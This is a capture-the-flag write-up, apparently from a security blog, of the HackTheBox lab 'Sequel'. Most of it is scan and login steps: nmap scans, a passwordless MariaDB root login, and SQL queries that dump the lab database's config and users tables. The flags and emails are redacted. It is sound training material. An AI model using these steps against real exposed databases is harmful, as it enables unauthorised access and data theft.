Machine / Machines

Sequel

By Jennofrie Daguil ยท Cybersecurity and Red Team Operator

Sequel is an Easy Starting Point machine on HackTheBox running Linux (Debian 10). The only exposed service is MariaDB 10.3.27 on port 3306, accessible as root with no password. The flag is stored in a database table. Result: Single open port -- 3306/tcp...

EasyPublished 2026-04-15Sanitized local writeup

Scenario

Sequel attack path

Sequel is an Easy Starting Point machine on HackTheBox running Linux (Debian 10). The only exposed service is MariaDB 10.3.27 on port 3306, accessible as root with no credential. The proof is stored in a database table. Result: Single open port -- 3306/tcp...

Objective

Machine walkthrough focused on Machines evidence, validation, and reusable operator lessons.

Sequel sanitized attack graph

Walkthrough flow

01

Enumeration

02

Exploitation

03

Lessons Learned

04

Phase 0: Setup

05

Phase 1: Recon

Source coverage

Moderate source coverage

Status: partial. This article is generated from 2 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.

57% coverage
Evidence verdict

Moderate confidence: the page is useful for review, but it should be treated as partial because the available source material is thinner or less narrative-complete.

  • <TARGET>-Sequel/walkthrough.md
  • HTB/<TARGET>-Sequel/notes.md

Technical Walkthrough

Sequel - Walkthrough

Overview

Sequel is an Easy Starting Point machine on HackTheBox running Linux (Debian 10). The only exposed service is MariaDB 10.3.27 on port 3306, accessible as root with no password. The flag is stored in a database table.

Enumeration

Port Scan

bash
nmap -sC -sV <TARGET>

Result: Single open port -- 3306/tcp running MariaDB 10.3.27-0+deb10u1.

bash
nmap -p<redacted> --min-rate 5000 <TARGET>

Result: Confirmed only 3306 is open (two filtered high ports are noise).

Service Details

  • MariaDB 10.3.27 on Debian 10 (Buster)
  • Protocol 10, mysql_native_password authentication
  • Autocommit enabled

Exploitation

MySQL Root with No Password

The name "Sequel" is a pun on SQL, hinting at a database-focused box. The first thing to try on an Easy box with MySQL exposed is root with no password:

bash
mysql -h <TARGET> -u root

Result: Connection successful. Full root access to MariaDB.

Database Enumeration

sql
SHOW <secret redacted>;
text
htb
information_schema
mysql
performance_schema

The htb database is the target:

sql
USE htb;
SHOW TABLES;
text
config
users

Flag Retrieval

sql
SELECT * FROM config;
idnamevalue
1timeout60s
2securitydefault
3auto_logonfalse
4max_size2M
5flag<hash redacted>
6enable_uploadsfalse
7authentication_methodradius

Users Table

sql
SELECT * FROM users;
idusernameemail
1admin<email redacted>
2lara<email redacted>
3sam<email redacted>
4mary<email redacted>

Flag

<hash redacted>

Lessons Learned

  1. Machine name is a hint -- "Sequel" = SQL. Always consider the name as a clue to the attack vector.
  2. Always try no-password root on exposed MySQL/MariaDB -- especially on Easy boxes, this is a common pattern.
  3. Single-port boxes are straightforward -- when only one port is open, the entire attack path goes through that service.
  4. Enumerate all databases and tables -- flags and credentials can be stored anywhere in the database, not just obvious table names.

Tools Used

  • nmap (port scanning, service/version detection)
  • mysql client (database access)

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Target Details

  • IP: <TARGET>
  • Name: Sequel
  • OS: Linux (Debian 10 Buster)
  • Difficulty: Easy (Starting Point)
  • Attacker IP: <TARGET> (Pwnbox VPN)
  • Started: 2026-05-05
  • Completed: 2026-05-05
  • Solve Time: ~5 minutes

Hypothesis

Name "Sequel" = SQL pun. Expected MySQL/MariaDB with weak/no auth. Confirmed.

Phase 0: Setup

  • [x] Workspace created at <local workspace><TARGET>-Sequel/
  • [x] Pwnbox SSH verified (x08@<TARGET>)
  • [x] VPN IP confirmed: <TARGET>
  • [x] Target reachable: ping OK (303ms)

Phase 1: Recon

  • [x] Full TCP scan: only 3306/tcp open (mysql)
  • [x] Service: MariaDB 10.3.27 on Debian 10
  • [x] Auth plugin: mysql_native_password
  • No web, SSH, or other services exposed

Phase 3: Synthesis

  • Single open port: MySQL/MariaDB 3306
  • Root login with no password is the obvious vector for an Easy Starting Point box
  • No privesc needed -- this is a single-flag box

Phase 4: Foothold / Flag

  • [x] Connected as root with no password: mysql -h <TARGET> -u root
  • [x] Found htb database with config and users tables
  • [x] Flag stored in htb.config table under name='flag'

Credentials Found

UserPasswordService
root(none)MySQL

Users Discovered

  • <email redacted>
  • <email redacted>
  • <email redacted>
  • <email redacted>

Flag

  • Flag: <hash redacted> (from htb.config table)

Related insights

MachinesArchetype Walkthrough - HTB Starting PointMachinesBaseMachinesBase